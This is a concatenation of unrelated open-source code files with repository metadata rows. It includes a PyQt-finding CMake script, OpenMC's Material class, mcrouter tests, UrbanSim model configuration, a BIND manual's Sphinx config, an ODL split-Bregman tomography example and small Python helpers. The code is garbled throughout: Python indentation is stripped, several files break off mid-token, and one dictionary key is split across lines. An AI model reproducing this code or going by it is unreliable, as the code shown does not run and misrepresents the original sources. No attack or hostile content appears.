| jacksarick/My-Code | Python/python challenges/euler/017_number_letter_counts.py | Python | mit | 25 | 0.08 |
## Need to find a library
| melvyn-sopacua/kdelibs | cmake/modules/FindPyQt.py | Python | gpl-2.0 | 1,768 | 0.001697 |
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Copyright (c) 2014, Raphael Kubo da Costa <rakuco@FreeBSD.org>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
import PyQt4.QtCore
import os
import sys
def get_default_sip_dir():
# This is based on QScintilla's configure.py, and only works for the
# default case where installation paths have not been changed in PyQt's
# configuration process.
if sys.platform == 'win32':
pyqt_sip_dir = os.path.join(sys.prefix, 'sip', 'PyQt4')
else:
pyqt_sip_dir = os.path.join(sys.prefix, 'share', 'sip', 'PyQt4')
return pyqt_sip_dir
def get_qt4_tag(sip_flags):
in_t = False
for item in sip_flags.split(' '):
if item == '-t':
in_t = True
elif in_t:
if item.startswith('Qt_4'):
return item
else:
in_t = False
raise ValueError('Cannot find Qt\'s tag in PyQt4\'s SIP flags.')
if __name__ == '__main__':
try:
import PyQt4.pyqtconfig
pyqtcfg = PyQt4.pyqtconfig.Configuration()
sip_dir = pyqtcfg.pyqt_sip_dir
sip_flags = pyqtcfg.pyqt_sip_flags
except ImportError:
# PyQt4 >= 4.10.0 was built with configure-ng.py instead of
# configure.py, so pyqtconfig.py is not installed.
sip_dir = get_default_sip_dir()
sip_flags = PyQt4.QtCore.PYQT_CONFIGURATION['sip_flags']
print('pyqt_version:%06.x' % PyQt4.QtCore.PYQT_VERSION)
print('pyqt_version_str:%s' % PyQt4.QtCore.PYQT_VERSION_STR)
print('pyqt_version_tag:%s' % get_qt4_tag(sip_flags))
print('pyqt_sip_dir:%s' % sip_dir)
print('pyqt_sip_flags:%s' % sip_flags)
| lilulu/openmc | openmc/material.py | Python | mit | 18,937 | 0.000422 |
from collections import Iterable
from copy import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import sys
if sys.version_info[0] >= 3:
basestring = str
import openmc
from openmc.checkvalue import check_type, check_value, check_greater_than
from openmc.clean_xml import *
# A list of all IDs for all Materials created
MATERIAL_IDS = []
# A static variable for auto-generated Material IDs
AUTO_MATERIAL_ID = 10000
def reset_auto_material_id():
global AUTO_MATERIAL_ID, MATERIAL_IDS
AUTO_MATERIAL_ID = 10000
MATERIAL_IDS = []
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/cm3', 'at/b-cm', 'at/cm3', 'sum']
# Constant for density when not needed
NO_DENSITY = 99999.
class Material(object):
"""A material composed of a collection of nuclides/elements that can be assigned
to a region of space.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
Attributes
----------
id : int
Unique identifier for the material
density : float
Density of the material (units defined separately)
density_units : str
Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/cm3',
'atom/b-cm', 'atom/cm3', or 'sum'.
"""
def __init__(self, material_id=None, name=''):
# Initialize class attributes
self.id = material_id
self.name = name
self._density = None
self._density_units = ''
# A dictionary of Nuclides
# Keys - Nuclide names
# Values - tuple (nuclide, percent, percent type)
self._nuclides = {}
# A dictionary of Elements
# Keys - Element names
# Values - tuple (element, percent, percent type)
self._elements = {}
# If specified, a list of tuples of (table name, xs identifier)
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@id.setter
def id(self, material_id):
global AUTO_MATERIAL_ID, MATERIAL_IDS
# If the Material already has an ID, remove it from global list
if hasattr(self, '_id') and self._id is not None:
MATERIAL_IDS.remove(self._id)
if material_id is None:
self._id = AUTO_MATERIAL_ID
MATERIAL_IDS.append(AUTO_MATERIAL_ID)
AUTO_MATERIAL_ID += 1
else:
check_type('material ID', material_id, Integral)
if material_id in MATERIAL_IDS:
msg = 'Unable to set Material ID to {0} since a Material with ' \
'this ID was already initialized'.format(material_id)
raise ValueError(msg)
check_greater_than('material ID', material_id, 0)
self._id = material_id
MATERIAL_IDS.append(material_id)
@name.setter
def name(self, name):
check_type('name for Material ID={0}'.format(self._id),
name, basestring)
self._name = name
def set_density(self, units, density=NO_DENSITY):
"""Set the density of the material
Parameters
----------
units : str
Physical units of density
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
check_type('the density for Material ID={0}'.format(self._id),
density, Real)
check_value('density units', units, DENSITY_UNITS)
if density == NO_DENSITY and units is not 'sum':
msg = 'Unable to set the density Material ID={0} ' \
'because a density must be set when not using ' \
'sum unit'.format(self._id)
raise ValueError(msg)
self._density = density
self._density_units = units
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, basestring) and filename is not None:
msg = 'Unable to add OTF material file to Material ID={0} with a ' \
'non-string name {1}'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
@convert_to_distrib_comps.setter
def convert_to_distrib_comps(self):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
self._convert_to_distrib_comps = True
def add_nuclide(self, nuclide, percent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str or openmc.nuclide.Nuclide
Nuclide to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(nuclide, (openmc.Nuclide, str)):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-Nuclide value {1}'.format(self._id, nuclide)
raise ValueError(msg)
elif not isinstance(percent, Real):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
elif percent_type not in ['ao', 'wo', 'at/g-cm']:
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
if isinstance(nuclide, openmc.Nuclide):
# Copy this Nuclide to separate it from the Nuclide in
# other Materials
nuclide = deepcopy(nuclide)
else:
nuclide = openmc.Nuclide(nuclide)
self._nuclides[nuclide._name] = (nuclide, percent, percent_type)
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : openmc.nuclide.Nuclide
Nuclide to remove
"""
if not isinstance(nuclide, openmc.Nuclide):
msg = 'Unable to remove a Nuclide {0} in Material ID={1} ' \
'since it is not a Nuclide'.format(self._id, nuclide)
raise ValueError(msg)
# If the Material contains the Nuclide, delete it
if nuclide._name in self._nuclides:
del self._nuclides[nuclide._name]
def add_element(self, element, percent, percent_type='ao'):
"""Add a natural element to the material
Parameters
----------
element : openmc.element.Element
Element to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(element, openmc.Element):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-Element value {1}'.format(self._id, element)
raise Val
| tempbottle/mcrouter | mcrouter/test/test_mcrouter.py | Python | bsd-3-clause | 13,301 | 0.001579 |
# Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
from mcrouter.test.MCProcess import Memcached
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestDevNull(McrouterTestCase):
config = './mcrouter/test/test_dev_null.json'
extra_args = []
def setUp(self):
# The order here must corresponds to the order of hosts in the .json
self.mc_good = self.add_server(Memcached())
self.mc_wild = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_dev_null(self):
mcr = self.get_mcrouter()
# finally setup is done
mcr.set("good:key", "should_be_set")
mcr.set("key", "should_be_set_wild")
mcr.set("null:key", "should_not_be_set")
mcgood_val = self.mc_good.get("good:key")
mcnull_val = self.mc_wild.get("null:key")
mcwild_val = self.mc_wild.get("key")
self.assertEqual(mcgood_val, "should_be_set")
self.assertEqual(mcnull_val, None)
self.assertEqual(mcwild_val, "should_be_set_wild")
self.assertEqual(mcr.delete("null:key2"), None)
self.assertEqual(int(mcr.stats('ods')['dev_null_requests']), 2)
class TestMigratedPools(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools.json'
extra_args = []
def setUp(self):
self.wild_new = self.add_server(Memcached())
self.wild_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.wild_old.set("get-key-" + str(phase), str(phase))
self.wild_new.set("get-key-" + str(phase), str(phase * 100))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.wild_old.get("set-key-1"), str(42))
self.assertEqual(self.wild_new.get("set-key-1"), None)
mcr.delete("get-key-1")
#make sure the delete went to old but not new
self.assertEqual(self.wild_old.get("get-key-1"), None)
self.assertEqual(self.wild_new.get("get-key-1"), str(100))
#next phase
time.sleep(2)
# gets/sets go to the old place
self.assertEqual(mcr.get("get-key-2"), str(2))
mcr.set("set-key-2", str(4242))
self.assertEqual(self.wild_old.get("set-key-2"), str(4242))
self.assertEqual(self.wild_new.get("set-key-2"), None)
mcr.delete("get-key-2")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-2"), None)
self.assertEqual(self.wild_new.get("get-key-2"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(300))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.wild_old.get("set-key-3"), None)
self.assertEqual(self.wild_new.get("set-key-3"), str(424242))
mcr.delete("get-key-3")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-3"), None)
self.assertEqual(self.wild_new.get("get-key-3"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-4"), str(400))
mcr.set("set-key-4", str(42424242))
self.assertEqual(self.wild_old.get("set-key-4"), None)
self.assertEqual(self.wild_new.get("set-key-4"), str(42424242))
mcr.delete("get-key-4")
#make sure the delete went to the new place only
self.assertEqual(self.wild_old.get("get-key-4"), str(4))
self.assertEqual(self.wild_new.get("get-key-4"), None)
class TestMigratedPoolsFailover(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools_failover.json'
extra_args = []
def setUp(self):
self.a_new = self.add_server(Memcached())
self.a_old = self.add_server(Memcached())
self.b_new = self.add_server(Memcached())
self.b_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools_failover(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.a_old.set("get-key-" + str(phase), str(phase))
self.a_new.set("get-key-" + str(phase), str(phase * 10))
self.b_old.set("get-key-" + str(phase), str(phase * 100))
self.b_new.set("get-key-" + str(phase), str(phase * 1000))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.a_old.get("set-key-1"), str(42))
self.a_old.terminate()
self.assertEqual(mcr.get("get-key-1"), str(100))
mcr.set("set-key-1", str(42))
self.assertEqual(self.b_old.get("set-key-1"), str(42))
#next phase
time.sleep(2.5)
self.assertEqual(mcr.get("get-key-2"), str(200))
mcr.set("set-key-2", str(42))
self.assertEqual(self.b_old.get("set-key-2"), str(42))
#next phase
time.sleep(2.5)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(30))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.a_new.get("set-key-3"), str(424242))
self.a_new.terminate()
self.assertEqual(mcr.get("get-key-3"), str(3000))
class TestDuplicateServers(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only one proxy destination connection is made
# for all the duplicate servers
self.assertEqual(1, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
class TestDuplicateServersDiffTimeouts(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers_difftimeouts.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers_difftimeouts(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only two proxy destination connections are made
# for all the duplicate servers in pools with diff timeout
self.assertEqual(2, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-2000'
self.assertTrue(key in stats)
class TestSamePoolFailover(McrouterTestCase):
config
| christianurich/VIBe2UrbanSim | 3rdparty/opus/src/psrc/config/workplace_zone_choice_model_config.py | Python | gpl-2.0 | 13,587 | 0.011261 |
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.configs.base_configuration import AbstractUrbansimConfiguration
from opus_core.resources import merge_resources_if_not_None
import copy
"""this configuration file specifying workplace choice models:
home_based_workplace_choice_model, workplace_choice_model_for_residents,
workplace_choice_model_for_immigrants, and
simple models keeping consistency between persons and households/jobs.
Home base choice model is defined in urbansim.configs.general_configuration_with_changed_elcm
"""
config = AbstractUrbansimConfiguration()
run_configuration = config.copy()
wlcm_model_configuration = {
"estimation":"opus_core.bhhh_mnl_estimation",
"sampler":"opus_core.samplers.weighted_sampler",
"sample_size_locations":30,
"weights_for_estimation_string":"urbansim.zone.number_of_non_home_based_jobs",
"compute_capacity_flag":True,
"capacity_string":"urbansim.zone.number_of_non_home_based_jobs",
"number_of_units_string":"urbansim.zone.number_of_non_home_based_jobs",
}
run_configuration['models_configuration']['workplace_choice_model_for_resident']= wlcm_model_configuration
my_controller_configuration = {
'household_person_consistency_keeper':{
"import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
"init": {
"name": "PersonDatasetConsistencyKeeperModel",
"arguments": {},
},
"run": {
"arguments": {"household_set": "household",
"person_set":"person",
"expand_person_set":True,
}
},
},
# This isn't necessary since we don't explicitly match person to job, but number of jobs and persons should match at zone level
# 'job_person_consistency_keeper':{
# "import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
# "init": {
# "name": "PersonDatasetConsistencyKeeperModel",
# "arguments": {},
# },
# "run": {
# "arguments": {"job_set": "job",
# "person_set":"person",
# "expand_person_set":False,
# }
# },
# },
'workplace_choice_model_for_resident': {
"import": {"urbansim.models.agent_location_choice_model":"AgentLocationChoiceModel"},
"init": {
"name": "AgentLocationChoiceModel",
"arguments": {
"location_set":"zone",
"model_name":"'Non-home-based Workplace Choice Model for residents'",
"short_name":"'NHBWCM'",
"choices":"'urbansim.lottery_choices'",
"submodel_string":"'psrc.person.household_income'",
# "filter": "'psrc.job.is_untaken_non_home_based_job'",
"location_id_string":"'psrc.person.zone_id'",#"'psrc.person.workplace_zone_id'",
"run_config":"models_configuration['workplace_choice_model_for_resident']",
"estimate_config":"models_configuration['workplace_choice_model_for_resident']"
}},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"specification_storage": "base_cache_storage", #"models_configuration['specification_storage']",
"specification_table": "'workplace_choice_model_for_resident_specification'",
"coefficients_storage": "base_cache_storage", #"models_configuration['coefficients_storage']",
"coefficients_table": "'workplace_choice_model_for_resident_coefficients'",
},
"output": "(specification, coefficients)"
},
"run": {
"arguments": {"specification": "specification",
"coefficients":"coefficients",
"agent_set": "person",
"agents_index": None,
"agents_filter":"'psrc.person.is_non_home_based_worker_without_workplace_zone'",
"data_objects": "datasets",
"chunk_specification":"{'records_per_chunk':5000}",
"debuglevel": run_configuration['debuglevel'] }
},
"prepare_for_est
|
imate": {
"name": "prepare_for_estimate",
"arguments": {
"agent_set":"person",
"join_datasets": "False",
"agents_for_estimation_storage": "base_cache_storage",
"agents_for_estimation_table": "'workers_for_estimation'",
"filter":None,
"data_objects": "datasets"
},
"output": "(specification, index)"
},
"estimate": {
"arguments": {
"specification": "specification",
"agent_set": "person",
"agents_index": "index",
"data_objects": "datasets",
"debuglevel": run_configuration['debuglevel']},
"output": "(coefficients, dummy)"
},
},
"job_change_model":{
"import": {"urbansim.models.agent_relocation_model":
"AgentRelocationModel"
},
"init": {
"name": "AgentRelocationModel",
"arguments": {"choices":"opus_core.random_choices",
"probabilities":"psrc.job_change_probabilities",
"location_id_name":"'psrc.person.workplace_zone_id'",
"model_name":"job change model",
"debuglevel": config['debuglevel']
},
},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"what": "'person'", "rate_storage": "base_cache_storage",
"rate_table": "'annual_job_change_rates_for_workers'"},
"output": "jcm_resources"
},
"run": {
"arguments": {"agent_set": "person", "resources": "jcm_resources"},
"output": "jcm_index"
}
}
}
my_controller_configuration["workplace_choice_model_for_immigrant"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["workplace_choice_model_for_immigrant"]["init"]["arguments"]["model_name"] = "'Non-home-based Workplace Choice Model for immigrants'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["specification_table"] = "'workplace_choice_model_for_immigrant_specification'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'workplace_choice_model_for_immigrant_coefficients'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_immigrant_worker_without_workplace_zone'"
my_controller_configuration["home_based_workplace_choice_model"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["filter"] = "'psrc.job.is_untaken_home_based_job'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["home_based_wor
| perlang/bv9arm-chinese | branches/9.16.18/arm/conf.py | Python | mpl-2.0 | 5,717 | 0.000352 |
############################################################################
# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at https://mozilla.org/MPL/2.0/.
#
# See the COPYRIGHT file distributed with this work for additional
# information regarding copyright ownership.
############################################################################
# flake8: noqa: E501
from typing import List, Tuple
from docutils import nodes
from docutils.nodes import Node, system_message
from docutils.parsers.rst import roles
from sphinx import addnodes
from sphinx.util.docutils import ReferenceRole
GITLAB_BASE_URL = 'https://gitlab.isc.org/isc-projects/bind9/-/'
# Custom Sphinx role enabling automatic hyperlinking to GitLab issues/MRs.
class GitLabRefRole(ReferenceRole):
def __init__(self, base_url: str) -> None:
self.base_url = base_url
super().__init__()
def run(self) -> Tuple[List[Node], List[system_message]]:
gl_identifier = '[GL %s]' % self.target
target_id = 'index-%s' % self.env.new_serialno('index')
entries = [('single', 'GitLab; ' + gl_identifier, target_id, '', None)]
index = addnodes.index(entries=entries)
target = nodes.target('', '', ids=[target_id])
self.inliner.document.note_explicit_target(target)
try:
refuri = self.build_uri()
reference = nodes.reference('', '', internal=False, refuri=refuri,
classes=['gl'])
if self.has_explicit_title:
reference += nodes.strong(self.title, self.title)
else:
reference += nodes.strong(gl_identifier, gl_identifier)
except ValueError:
error_text = 'invalid GitLab identifier %s' % self.target
msg = self.inliner.reporter.error(error_text, line=self.lineno)
prb = self.inliner.problematic(self.rawtext, self.rawtext, msg)
return [prb], [msg]
return [index, target, reference], []
def build_uri(self):
if self.target[0] == '#':
return self.base_url + 'issues/%d' % int(self.target[1:])
if self.target[0] == '!':
return self.base_url + 'merge_requests/%d' % int(self.target[1:])
raise ValueError
def setup(_):
roles.register_local_role('gl', GitLabRefRole(GITLAB_BASE_URL))
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'BIND 9 管理员参考手册'
copyright = u'2021, Internet Systems Consortium'
author = u"Internet Systems Consortium \\and 翻译: sunguonian@yahoo.com"
# The full version, including alpha/beta/rc tags
release = 'BIND 9.16.18(稳定版)'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'*.grammar.rst',
'*.zoneopts.rst',
'catz.rst',
'dlz.rst',
'dnssec.rst',
'dyndb.rst',
'logging-cattegories.rst',
'managed-keys.rst',
'pkcs11.rst',
'plugins.rst'
]
# The master toctree document.
master_doc = 'index'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#html_theme = 'alabaster'
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
latex_engine = 'xelatex'
latex_elements = {
'fontpkg': r'''
\setmainfont{Source Han Serif CN:style=Regular}
\setsansfont{Source Han Sans CN Medium:style=Medium,Regular}
\setmonofont{Source Han Sans CN:style=Regular}
\setCJKfamilyfont{song}{Source Han Serif CN:style=Regular}
\setCJKfamilyfont{heiti}{Source Han Sans CN:style=Regular}
''',
'pointsize': '11pt',
'preamble': r'\input{../mystyle.tex.txt}'
}
latex_documents = [
(master_doc, 'Bv9ARM.tex', u'BIND 9管理员参考手册', author, 'manual'),
]
latex_logo = "isc-logo.pdf"
|
danrg/RGT-tool
|
src/RGT/XML/SVG/Animation/baseAnimationNode.py
|
Python
|
mit
| 1,499
| 0.004003
|
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
from RGT.XML.SVG.Attribs.conditionalProcessingAttributes import ConditionalProcessingAttributes
from RGT.XML.SVG.Attribs.xlinkAttributes import XlinkAttributes
from RGT.XML.SVG.Attribs.animationTimingAttributes import AnimationTimingAttributes
class BaseAnimationNode(BasicSvgNode):
ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED = 'externalResourcesRequired'
def __init__(self, ownerDoc, tagName):
BasicSvgNode.__init__(self, ownerDoc, tagName)
ConditionalProcessingAttributes.__init__(self)
XlinkAttributes.__init__(self)
AnimationTimingAttributes.__init__(self)
self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS)
def setExternalResourcesRequired(self, data):
allowedValues = ['true', 'false']
if data is not None:
if data not in allowedValues:
values = ''
for value in allowedValues:
values += value + ', '
values = values[0: len(values) - 2]
                raise ValueError('Value not allowed, only ' + values + ' are allowed')
else:
self._setNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED, data)
def getExternalResourcesRequired(self):
node = self._getNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED)
if node is not None:
return node.nodeValue
return None
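# Illustrative sketch (not from the original module; `node` stands for an
# already-constructed subclass instance): the setter only accepts the literal
# strings 'true' and 'false', anything else raises ValueError, and passing
# None leaves the attribute untouched.
#
#     node.setExternalResourcesRequired('true')
#     node.getExternalResourcesRequired()       # -> 'true'
#     node.setExternalResourcesRequired('yes')  # raises ValueError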
|
odlgroup/odl-examples
|
tomography_wavelet_split_bregman.py
|
Python
|
gpl-3.0
| 2,070
| 0.002415
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 11:34:27 2015
@author: JonasAdler
"""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
# External
import numpy as np
# Internal
import odl
from tomography_helper import ForwardProjector
def SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, iterations=1, N=1):
""" Reconstruct with split Bregman.
Parameters
----------
A : `odl.Operator`
Pojector
Phi : `odl.Operator`
Sparsifying transform
x : ``A.domain`` element
"""
Atf = A.adjoint(rhs)
b = Phi.range.zero()
d = Phi.range.zero()
op = mu * (A.adjoint * A) + la * (Phi.adjoint * Phi)
fig = None
for i in range(iterations):
for n in range(N):
# Solve tomography part iteratively
            rhs = mu * Atf + la * Phi.adjoint(d-b)
odl.solvers.conjugate_gradient(op, x, rhs, niter=2)
            # d = sign(Phi(x)+b) * max(|Phi(x)+b|-la^-1,0)
s = Phi(x) + b
d = s.ufunc.sign() * (s.ufunc.absolute().
ufunc.add(-1.0/la).
ufunc.maximum(0.0))
b = b + Phi(x) - d
fig = x.show(clim=[0.0, 1.1], fig=fig, show=True)
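# Sketch of the updates performed above (read directly off the code, not taken
# from a reference): each outer iteration approximately solves
#     (mu * A^T A + la * Phi^T Phi) x = mu * A^T f + la * Phi^T (d - b)
# with a few conjugate-gradient steps, then applies soft shrinkage
#     d = sign(Phi(x) + b) * max(|Phi(x) + b| - 1/la, 0)
# and updates the Bregman variable  b = b + Phi(x) - d.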
n = 100
# Create spaces
d = odl.uniform_discr([0, 0], [1, 1], [n, n])
ran = odl.uniform_discr([0, 0], [1, np.pi], [np.ceil(np.sqrt(2) * n), n])
# Create phantom
phantom = odl.util.shepp_logan(d, modified=True)
# These are tuning parameters in the algorithm
la = 500. / n # Relaxation
mu = 20000. / n # Data fidelity
# Create projector
Phi = odl.trafos.WaveletTransform(d, nscales=3, wbasis='db2', mode='per')
A = ForwardProjector(d, ran)
# Create data
rhs = A(phantom)
# Add noise
rhs.ufunc.add(np.random.rand(ran.size)*0.05, out=rhs)
# Reconstruct
x = d.zero()
#odl.solvers.conjugate_gradient_normal(A, x, rhs, niter=7)
SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, 100, 1)
x.show()
|
snelis/snelis
|
snelis/management/commands/__init__.py
|
Python
|
bsd-3-clause
| 1,601
| 0.001874
|
import re
class CommandError(Exception):
pass
class BaseCommand():
"""
    Base command; accepts and handles generic features shared by all commands,
    such as error handling and argument retrieval / checking.
"""
def __init__(self, args):
"""
Initialize the class
"""
self._args = args
    def arg(self, key):
"""
Retrieve a single argument
"""
return self._args.get(key)
def args(self, *keys):
"""
        Retrieve a set of arguments
"""
if keys:
return [self.arg(k) for k in keys]
else:
return self._args
def value(self, key):
"""
Retrieve a single argument
"""
        key = '<{0}>'.format(key)
return self.arg(key)
def option(self, key, value=None):
"""
Retrieve a single argument
"""
key = '--'+key
if value:
return self.arg(key) == value
return self.arg(key)
def args_context(self):
"""
Convert all options and values into a context usable by the template parser
"""
context = dict(options={}, values={})
for key, value in self.args().items():
expressions = {
'options': r'--(.*)',
'values': r'<(.*)>',
}
for group, expression in expressions.items():
matches = re.search(expression, key)
if matches:
context[matches.group(1).replace('-', '_')] = value
return context
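# Illustrative usage sketch (the argument dict below is hypothetical, in the
# docopt style the regexes above expect: '--option' and '<value>' keys):
#
#     cmd = BaseCommand({'--force': True, '<name>': 'demo'})
#     cmd.option('force')    # -> True
#     cmd.value('name')      # -> 'demo'
#     cmd.args_context()     # -> {'options': {}, 'values': {}, 'force': True, 'name': 'demo'}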
|
PythonRails/examples
|
blog/config.py
|
Python
|
mit
| 218
| 0
|
"""
Configuration for a project.
"""
rails = {
'models.engine': 'sqlalchemy',
'models.db.type': 'postgres',
'models.db.user': 'rails',
    'models.db.password': 'rails',
'views.engine': 'jinja',
}
|
jklaiho/django-class-fixtures
|
class_fixtures/utils/__init__.py
|
Python
|
bsd-3-clause
| 214
| 0.004673
|
import sys
from contextlib import contextmanager
from StringIO import StringIO
@contextmanager
def string_stdout():
output = StringIO()
sys.stdout = output
yield output
sys.stdout = sys.__stdout__
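# Illustrative usage (not part of the original module): temporarily redirect
# stdout into a StringIO buffer, then restore the real stdout on exit.
#
#     with string_stdout() as out:
#         print('captured')
#     out.getvalue()   # -> 'captured\n'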
|
LeXuZZ/localway_tests
|
wtframework/wtf/tests/test_config_reader.py
|
Python
|
gpl-3.0
| 3,596
| 0.003337
|
##########################################################################
#This file is part of WTFramework.
#
